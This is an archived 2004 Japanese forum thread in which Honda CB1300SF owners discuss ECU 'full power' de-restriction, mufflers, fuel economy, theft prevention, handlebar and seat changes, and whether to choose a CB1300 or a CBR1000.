一昨日自分でフルパワー化して昨日ほぼ500Kmほど走りました。
街乗りはクラッチミートの瞬間から少し開けた時のトルクが
薄くなった感じがしましたが、特に不具合は感じませんでした。

加速はその時のギアにもよりますが、5000rpmから上でのパワー感が
1〜2枚上手って感じです。グワって感じ?国内仕様のCBと一緒に走ったので
よく分かりました。

燃費はパワー感が楽しくて開け開けで走っていたのでデータは取ってません。
それくらい楽しいです。リミッターがないのもイイ!

住んでいるところが北海道なんで、道北、道東へ仲間と走りに行くと
まわりも大型ばかり、しかも結構いじっている連中ばっかなんで、
爆走極悪ツーになること多々有りのためへたれの腕カバーの為
フルパワー化しました。
ドンつきも多少解消され自分にとってはやってよかったと思っています。


147 :E:04/08/11 10:48 ID:aHt5ynPT
>>146
レスありがとうございます!
北海道にお住みですか‥うらやましい‥

ところで、マフラーはどこのをつけてらっしゃるのでしょうか?
おすすめのマフラーとかあります?

148 :774RR:04/08/11 15:19 ID:sqYo0sfn
>>146
フルパワー化はここの板の上に書いてある通りでOKなのですか?
自分でやるとなるとECUの配線が心配なんですが・・・

149 :黒CB:04/08/11 21:29 ID:fhlL0ig8
>>146、147
マフラーはOVERのフルチタンフルエキです。
漏れはオーダー時に納期の一番早いのはこれとアクラって言われて
静かな方を選びました。
周りからはずいぶんおとなしいって言われますが、車検の事や付近住民への
迷惑度を考えると、、、

フルパワー化はここの版の方法でOKでしたよ。特に難しくはありません。
コネクタから配線を引き出す時にちょっとコツが要るくらいです。
ポイントとしては極細の千枚通しの様なものでコネクタ内の配線の
抜け止めを上にあおって持ち上げつつ配線を引っ張ることですね。
LEDライト等で先にコネクタ内を照らして構造を確認、
脳内シミュレーションすることをお勧めします。

道北方面のとある直線で試してみたらメーター読みでふふわKm/hまでは
確認しています。さきに人間が風圧でGive Upでした。

あと、国内仕様の時には感じなかったアフターファイアが出るようになりました。
原因は不明です。
1−2や2−3のシフトアップ時に軽く出るような感じです。


150 :黒CB:04/08/11 21:32 ID:fhlL0ig8
スマソ、レス番まちがえますた。
>>147,148ですね。

151 :鬼貧乏:04/08/12 00:19 ID:KopPzH+x
近所迷惑を考えてるだ?
高級そうなバイクに乗ってる時点で腹が立つんだけど


152 :774RR:04/08/12 00:22 ID:Tgb+ve90
>>151
それはひどいさかうらみですね

153 :774RR:04/08/12 00:33 ID:ZdkGEvqD
04年型をフルパワー
マフラー:ワイバンのシングル

部品代:2千円程度
工賃:1.5万円程度

インプレ
CB400SFから乗り換えた時に回転の上がり方に不満があったが、
マフラー交換とフルパワー化で回して楽しいエンジンに性格が変わった。

低回転はトルク感が落ちるが、どんつきがなくなり扱いやすくなった。
また中間/高速域共に加速感は大満足。

燃費:ノーマル300キロ/満タン→250キロ/満タンへ悪化。
楽しくて高回転まで回してしまうので仕方がないと思う。
(今までより1速低いギヤで走行している。)

カタログの数値よりフィーリングを買うつもりの方が良いでしょう。
(数字が欲しいならRRでもどうぞ)

ともかく乗って楽しくなるので、お勧めします。

補足:アイドリングは1200弱まで少し上げた方が良いと思う。

154 :774RR:04/08/12 04:38 ID:RmKmUlf/
>>151
貧乏人はカエレ

155 :774RR:04/08/12 08:15 ID:JvD5QHr2
>>149
有り難う御座います。
早速フルパワー化してみます。その前にFIのファンネルを購入
しなければ・・・


156 :774RR:04/08/12 08:32 ID:0FjVyXVm
FIのファンネル??

157 :774RR:04/08/12 08:46 ID:EqFovGV/
元03フルパワー化海苔です。
マフラーはアップスタイルが好きなので、エイミングスポーツのフルエキを付けた。
音量はそこそこ爆音で測定したら99dbだったかな。アフターファイヤーでまくりです。
マンションの駐輪場なので流石にヤバイと思いエンドバッフルを付けたけど
音が悪くなったので、オートマジックのインナーバッフルを装着すると、音質はあまり
変わらずに音量が抑ええられお気に入り。
アフターファイヤーは出なくなった。

158 :E:04/08/12 10:58 ID:Uq6OVusZ
フルパワー化にあたって、
国内仕様よりも特に気をつけたほうが良い
メンテとかはありますかね?

159 :CB1000 ◆g6inFbM64o :04/08/12 11:01 ID:iIswSyQK
質問ばかりでつね

160 :E:04/08/12 11:57 ID:Uq6OVusZ
>>159

すみませぬ。
フルパワー乗りのなるにあたって、
現オーナーさんの感想がしりたくて‥

161 :774RR:04/08/12 11:59 ID:dInY/3VA
初期型のマッシヴでソリッドな質感とパッケージングが忘れられない





傍観者です

162 :774RR:04/08/12 12:25 ID:g6ZnqXTm
某掲示板に載っていたことですが、
04型とそれ以前ってかなり別物ですか?

163 :鬼貧乏:04/08/12 23:12 ID:yLlrham6
なんだって?
何が近所迷惑だ
マフラー変えてる時点で大迷惑なんだよ
うるさいったらありゃしない

164 :774RR:04/08/12 23:17 ID:Pahxi1bf
          │
          │
          │
          │
          │            _
          │         /  ̄   ̄ \
          │        /、          ヽ
          J         |・ |―-、       |
                   q -´ 二 ヽ      |
                  ノ_ ー  |      |
                   \. ̄`  |      /
                   O===== |
                  /          |
                  /    /      |


165 :774RR:04/08/12 23:55 ID:XCnGWXlh
たのしーですか???????????・・


166 :774RR:04/08/13 00:51 ID:AmSUgGNx
>>164
なかなか面白い。

167 :774RR:04/08/13 02:02 ID:prG33/A0
スリップオンでおおすすめは?

168 :処刑ライダー ◆.EDMOUBKE2 :04/08/13 02:04 ID:J5AeP4fR
スペシャル・モデル、下駄っぽいよなぁ・・・。

169 :774RR:04/08/13 04:21 ID:f+jgZBR0
ところで、赤白のツートンってかっこいい?

170 :774RR:04/08/13 05:13 ID:U+udvUxp
赤白がカッコイイとは思わないけど
それ以外は地味。
早く限定カラー出ないかな。

171 :774RR:04/08/13 11:22 ID:5A42XCSl
Uターン失敗して納車3ヶ月目で転倒…_| ̄|○

172 :774RR:04/08/13 15:02 ID:f+jgZBR0
なんか最近、赤白飽きてきたんだよね。
でも、今さら限定カラー出されても遅いんだけど‥

173 :774RR:04/08/13 17:20 ID:U+udvUxp
限定カラー
そういう話しは無いのかね?

174 :774RR:04/08/13 19:01 ID:f+jgZBR0
01年と02年にプロス店から限定モデルが出たんだよね。
カラーリングとマフラー違いで、確かそれぞれ、500台と450台限定。
で、今回ドリーム店から出た限定が100台。
来年、8耐記念第二段として、また新しい限定モデル出るんじゃない?

175 :774RR:04/08/14 00:13 ID:/3Ceau0v
現行カラーがどうも気に入らないんですけど、
カスタムしてる人いますか?
その手の店に頼んだらいくらぐらいかかるんでしょうか?
私はパールシャイニングイエローがいいでつ。

176 :774RR:04/08/14 02:35 ID:/WqoYdbr
>>175
参考になるかどうか分からんけど、
以前バイク屋で、SSのフルカウルを単色に塗り替えていくらかかるか聞いたら、
「18万くらい」って言われた。多分、高めに言ってると思われる。
塗料の種類によるだろうけど、10万前後では?


177 :774RR:04/08/14 03:52 ID:Q7od9DjU
パールは塗るのに手間が掛かるから高いよ。
10万前後ってのはソリッドでしょ。
自分で塗ったら? 楽しいよ。

178 :774RR:04/08/14 08:44 ID:QEsHNSov
新車買って1ヶ月なんだけど。
エキパイのエンジン近くの部分がすごい汚い
なんていうか、メッキがハゲてるような感じ。

絶対にこうなるものなん??

179 :元99型乗り:04/08/14 09:38 ID:n4NhMZ5Q
>>178
多分、新車の時に付いてる防錆材が残ってたんだと思います。
それが焼きつくとそうなります。バイク屋さんが落とし損ねたかも。
自分の03型もそうなりました。そのうちマフラー交換するからいいけど...
めんどくさいけど、マフラーはずして一度全体を磨くと直るかも!?

180 :774RR:04/08/14 11:26 ID:Nlt1B2WO
CB1300とCB1300SFは何が違うのかな

181 :774RR:04/08/14 16:33 ID:TbmEk6Xq
ハンドルボジションを少し上げたいのですが初心者なのでよくわからないので
誰か教えてください(ハンドル他必要パ−ツ、取替方法など)
身長188cmあります。よろしくお願いします。

182 :774RR:04/08/15 01:39 ID:CNYwnoDb
>>181

初心者ならなぜショップに聞かない?
取替方法聞いてどうするつもりだ?
もしかして全部自分でやるつもりか?

183 :774RR:04/08/15 01:58 ID:/0a2ydkB
>>182
181は釣りでしょ。

184 :774RR:04/08/15 03:25 ID:/cKg6d2e
>>178
俺もなったよ。

185 :774RR:04/08/15 14:19 ID:dCcUlEbr
>>179
その可能性、高いですね。
以前、他のバイクでステンマフラーに変えたとき、ショップの作業員が
作業したままマフラーをふき取らず渡してくれて、手のアブラ(指紋とか)
のあとが醜く焼けてしまいました。
私も、そのときはそういう知識がありませんでした。

04CBを購入して3000キロ走りましたがマフラーきれいです。
納車してすぐ、パーツクリーナーでマフラーを脱脂しまくりました。
雑誌やHP等の写真を見ていても、この部分が汚く焼けているのを
よく見ますね。

186 :774RR:04/08/15 14:55 ID:nteoOElX
'98の初期型にずっと乗ってて、ヤマハのFJRに乗り換えて、そしたら
弟が'04のCB1300買った。乗ってみたら、なんだこのコンパクトさは!?
弟も、教習所のCB750より軽いかもって仰天してる。乗り心地は格段の進歩で
びっくりですな。ウワサには聞いていたが、これだけ旧型からイメチェン
してるとはおもわなんだ。エンジンも、FJRより、特に低速で扱いやすいし、
さすがのスムーズさ。FIのドンツキはあるけれど。
ただマフラー、今の国内規制って、ふざけんなの静か杉。
横で遠ざかっていくの聞いてると、ペリペリペリペリ・・・だけしか聞こえない。
乗ってるとエンジンかかってんだかなんだかわからない。やればここまで
できるってのはすごいことだけれど、なんだかなー。FJRの輸出向けの音量
のほうが、フツーに自然だわな。


187 :774RR:04/08/15 18:49 ID:/tqvF0SL
CB1000SFはこのスレで語ってもいいのかな

188 :774RR:04/08/15 20:40 ID:CNYwnoDb
ローダウンシートってあるけど、
逆にシートを高くしてるオーナーさんっています?
もう気持ち高いと、ポジションがしっくりくるのかなぁ、って思ってるんだけど。
それとも、サスを調整して高くした方がいいのかな?

189 :774RR:04/08/15 20:50 ID:0KlvtMr6
俺もシート考えてまっせ〜
なにせ純正はケツが痛いんだ〜

190 :774RR:04/08/15 21:17 ID:RxZWdynN
>>182
まぁ、まったり行こうや。そんなにネタ多くないんだしw

てなわけで
>>181
ハンドルポジションを上げるには、ハンドルバーをアップタイプにするか
ハンドルクランプ(トップブリッジとハンドルバーを繋いでいるパーツ)を
リプレイスのものに交換するのが一般的な手法でしょう。

クランプの交換くらいならたいした工具も必要ないはず(六角レンチとスパナくらい)。
ただしこの場合、それほど大きくはポジション変更になりません(UP15mm、手前に0〜20mmくらい)。
方法は、ノーマルクランプの上部の丸いメッキカバーを細いドライバーなどで外して
中のボルトを外すとハンドルバーが外れます。
次にトップブリッジの裏側にクランプのベース側をとじているナットがあるのでそれを緩めれば
クランプを完全に外すことが出来ます。組み付けは逆なのでわかると思います。

ハンドルバーの交換ですと大きくポジションをUPすることが可能ですが、ハンドルバーに穴を開ける必要があったり
ブレーキ・クラッチホースやアクセルワイヤーなどの延長(交換)が必要になってくるので、
181さんは初心者とのことなのでショップに相談するほうが良いと思いますよ。


191 :774RR:04/08/16 00:24 ID:RAelLD2y
なんかいっつもこの時期になると、モデルチェンジのことが気になるんだよなぁ

前モデルなんかも、結構マイナーチェンジ小出しでやってたもん

192 :774RR:04/08/16 00:43 ID:1n0PEeU+
CB1300SF(03〜04)の盗難情報、増えてるよ〜 ドキンドキン
「H・I・S・S」は無い物と考えて、盗難対策を!

193 :774RR:04/08/16 01:24 ID:h4Plx3Vl
詳しい情報教えて!

194 :774RR:04/08/16 08:18 ID:rQ6iblpk
盗難か〜
何か対策を取らないと駄目か・・・
メーカーオプションのリモコンイモビってどうなの?

195 :774RR:04/08/16 09:21 ID:A94g6rjx
やっぱ
ココセコムでしょ!

196 :774RR:04/08/16 09:46 ID:+OxSDrJ5
HONDA純正のアラームはどれも音が小さくて毛布一発で・・・
だから社外のがよさげ。
どれがいいかは防犯スレでじっくり探すといーよ

197 :774RR:04/08/16 09:50 ID:fSObALNu
俺はいつでもどこでもキー挿しっぱなしだけど重い車体だから誰も盗まないよ

198 :774RR:04/08/16 13:05 ID:ckfidFmZ
>>197
窃盗団工作員?

199 :774RR:04/08/16 21:44 ID:EdcZ1vOo
03〜モデルですが、ブレーキペダルを調整して
ペダルを低くしたら、調整ネジの凸の先ッぽがペダルのかかとみたいな部分と
あたってブレーキ踏み込めなくなるんですが、これは仕様??

ノーマルから3mm落とすのが限界・・・orz

200 :774RR:04/08/16 21:58 ID:hsKpxC7P
200

201 :774RR:04/08/16 23:03 ID:tSDIje+4
CBR1000と迷っているんですが、
街のりおよび、ちょっとツーリング(都内から横浜くらい)だと、CB1300とどちらがいいんでしょうか?

202 :774RR:04/08/16 23:40 ID:WDIDg2qK
>>201
ちょいのり


203 :774RR:04/08/16 23:51 ID:dYsAE5/h
主な使用目的が街乗り+ツーリングって自分で分かってるのに
CBR1000とCBを迷う人いるんだ・・・
SSの未来はまだまだ明るいぜ!!

ちなみにツーリングが都内から横浜までって
それも街乗りの範疇だと思うのですが・・・

204 :774RR:04/08/17 00:13 ID:gbE+tsFB
CBR or CBってタイプが違いすぎな気がするけど、
「大型に乗りたいけど、取り回しに不安あり」
ってことかな?

もしそうならCBRがいいと思う(乗ったことないけど)

東京〜横浜間だったら、荷物そんなにないでしょ?
前傾きつそうだけど、足つきはどっちも似たようなもんじゃない?
もし取り回しに自信ないんだったら、軽くてコンパクトなCBRがいいと思う。
現行CBは軽くなったとはいえ、ずっしりした手応えは感じるよ。

ともあれ、試乗すれば分かるよ。


205 :774RR:04/08/17 07:00 ID:dLxZELL1
レスありがとうございます!
実は大型まだ乗ったことなくて、違いがはっきり分からないのです・・・

206 :774RR:04/08/17 08:24 ID:MhRQcest
>>201
じっくり悩んでくださいな!
私も購入する時は悩みましたw
悩んでいるその時も楽しい時間ですよ!
ちなみみ私はSC54にしましたけどね〜

207 :774RR:04/08/17 08:45 ID:teLXNCca
>>205
大型と言うかバイクにあまり乗った事が無い人の
様ですね。

試乗までせずとも跨っただけでだいたいふいんきはつかめるので
お店屋さんにGO!!

208 :774RR:04/08/17 11:40 ID:9q4sEHC+
CBRはタンクが樹脂で出来てるのでタンクバッグ使いにくいのが難点
タンクが鉄だったらCBR買ってたかもしれないな……

209 :774RR:04/08/17 14:46 ID:gbE+tsFB
>>205
候補に上がってないけど、どうしてもHONDAがいいのなら
ホーネット900も比較対象に加えてみては?

210 :774RR:04/08/17 18:03 ID:teLXNCca
>>209 骨900はある程度わかってる香具師でないとつまらなく
感じる事だろうよ。乗り易いが飽きが来るしいまいち乗ってって
エキサイト出来ないんじゃないか?

てかカタログ落ちしてるマシソをすすめるのってどうよ?

211 :774RR:04/08/17 18:24 ID:gbE+tsFB
えっ、カタログ落ちしてたの?
うちのアパートで乗ってる奴がいて、毎日見てるもんだから…

それは失礼した。



212 :774RR:04/08/17 18:31 ID:teLXNCca
>211 VTR1000もな。

漏れは根っからHONDA党なんだが昨今の新車選択肢の少なさには
あきれてるよ。まぁ〜他3社もタイプ絞り杉だがな!!

何にせよスクーターで稼ぐのはやめていただきたいな。

213 :774RR:04/08/17 18:46 ID:gbE+tsFB
人間、一度、便利なものを覚えてしまうと、もう後戻りできないもの。
だから今後、バイク市場全体に占めるビグスクの割合は増えこそすれ、
減ることはないでしょう(素人考えだけど)

俺としては、ビグスクで荒稼ぎでもなんでもしてくれていいから、
儲からないビッグネイキッドやSSを造り続けて欲しいよ。

214 :774RR:04/08/17 20:02 ID:G7xAAa19
>>213
>俺としては、ビグスクで荒稼ぎでもなんでもしてくれていいから、
>儲からないビッグネイキッドやSSを造り続けて欲しいよ。

 と思うけれど、中型レプリカとか消えたからなぁ。
 儲からない車種は消えていきそうな気が…

215 :774RR:04/08/17 23:03 ID:aisrVb55
CB1000SFはこのスレでは語っちゃいけないってことなのね…
同じBIG-1なのに…

216 :774RR:04/08/18 01:44 ID:J4Tl5+QH
ageついでに来週あたり買いに行こう

217 :774RR:04/08/18 05:45 ID:J1J2afho
ビクスクが廃れる日はきっと来る

218 :205:04/08/18 05:57 ID:JFE/Z2Rf
皆様アドバイスありがとうございます!お礼遅れてごめんなさいm(__)m
バイク自体あんまり乗ったことないのですが、大型に憧れている次第です。
形はCBR1000に惹かれるのですが、1300SFの方が大きくてかっこいいな、と。パワーあるし。
CBR1000は、小さいので(私は身長180くらい)乗ったときさまにならないかな・・・?とか(^-^;
思っています。あと、横浜よりもう少し先、湘南あたりまで気楽に?行けたらいいな、と思うのです

219 :774RR:04/08/18 06:24 ID:zC7GNVdL
>>218
さまになるかどうかなんてあんまり気にしない方がいいと思うよ。

それより、ライポジが窮屈に感じる可能性は少しある。
CBRってまたがったことないけど、かなりコンパクトらしいから。
俺も身長180以上あるけど、近所のバイク屋に冷やかしに行った時、
CBRじゃなくて、大柄なGSX−Rの方を勧められたよ。

書き込みを見ると、性能云々より形的に両方を天秤にかけてるみたいだから、
だったら、CB1300の方がオールマイティーに使えて、後悔は少ないと思う。
CBRの方はかなり割り切った作りだから、買う側もその辺を理解して買わないと、
あとで後悔することになるかも。

まずは試乗して乗り比べるのがベスト。



220 :205:04/08/18 06:30 ID:JFE/Z2Rf
>>219
ご丁寧にありがとうございます!おっしゃるとおり、形で天秤にかけるところ大です(^-^;
CBRは割り切った作りなのですね。
乗り比べる事にいたします。早く試乗したいですo(^ー^)o

221 :774RR:04/08/18 06:42 ID:zC7GNVdL
おっ、こんな時間に起きてるとは‥

ついでだから書いとくけど、今月号の「クラブマン」てバイク雑誌に
CBRを含むスーパースポーツの特集記事があったから
読むと参考になるかもよ。

222 :205:04/08/18 06:57 ID:JFE/Z2Rf
読んでみます!情報ありがとうございます。
そろそろ出勤します。またよろしくお願いいたします\(^o^)/

223 :774RR:04/08/18 08:38 ID:LtlPfGbj
>>215
悪いがCB1300SFスレなのでCB1000SFの話は他所になるんでないかい。


224 :774RR:04/08/18 10:03 ID:/LCT5FuP
1300-1000=300
1000-750=250
排気量がCB750に近いのでCB750スレへどうぞ。

225 :元藤沢在住者:04/08/18 10:18 ID:LDwn6b3A
205さん、湘南方面とか言ってますけど、

R134あたり、休日はかなりクルマが溢れてますので、
はじめはやらないだろうけど、慣れてくるとすり抜け等も考慮してね、
 
まあ、夜走るなら問題無いな。

あー、あとR134ですり抜けやる時(特に夏場の渋滞時)は、
時々、走行区分違反取締りをやってますので、白線踏みは禁物です。


226 :774RR:04/08/18 11:33 ID:5fi/Qenu
>>224

CB750は空冷
それこそスレ違いでは

227 :774RR:04/08/18 13:35 ID:Y1+9PoIR
1300SFはもともと1000SFのモデルチェンジと考えたら
1000を語っても問題ないと思うけどね
ていうか初代BIG1・前1300SF・現行1300SFの三つを比べたら
現行型が一番スタンスが違うような気がする

228 :774RR:04/08/18 14:23 ID:zC7GNVdL
初代と二代目は乗ったことないけど、
二代目が一番異色なのかと思ってたよ。コンセプト的に。

まぁ個人的には、初代の話題もありだと思うけど。
ってか、ネタ尽き気味だし。

229 :774RR:04/08/18 20:00 ID:iOWmjfha
>>228
だよね〜。
二代目だけがちょっとちがうよね〜。


っていうかなんちゃってフィンはみとめない。



230 :774RR:04/08/18 20:09 ID:00A2qBQf
1000専用でスレたてりゃいいじゃん。

231 :774RR:04/08/18 20:28 ID:pIYBCkEP
1000専用スレか・・・(遠い目

232 :774RR:04/08/18 20:40 ID:iOWmjfha
cb1300sf(03〜)にモリワキのZERO SSフルエキつけている人いますか??
JMCAなんで爆音じゃないとおもいますが、重低音ですか??
インプレお願いします。


233 :774RR:04/08/18 21:20 ID:ap96QP+B
1000と初代1300の両方乗ったが、デカイ重いの感覚は同じように思えた。


234 :774RR:04/08/18 21:38 ID:XNaBuIQ/
別に1000の話題もいいんじゃないの?
同じBIG-1 だとは思わないけど。

エンジンのフィンに関してはホンダが両極端過ぎると思う。
1000はフィン無し、SC40は細かいフィン付き、SC54はまたフィン無し…
NC39とかZRXみたいに4〜5本付ければいいんじゃないの? 

235 :774RR:04/08/18 23:30 ID:X0LCvhQX
>>232
重低音で音量は個人的にはほぼノーマルと変わらないと思ってる。

ただフルパワー化済みとそうでないのとで音が違うような気がする・・・
気のせいかなあ?

236 :774RR:04/08/19 08:55 ID:vMF9xnOy
フィン付き黒エンジンが最強!!


by99海苔

237 :774RR:04/08/19 12:16 ID:KTisgJIM
SC54最高!

238 :774RR:04/08/19 13:52 ID:z3PkvD7T
水冷にフィンはいらん。

57 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)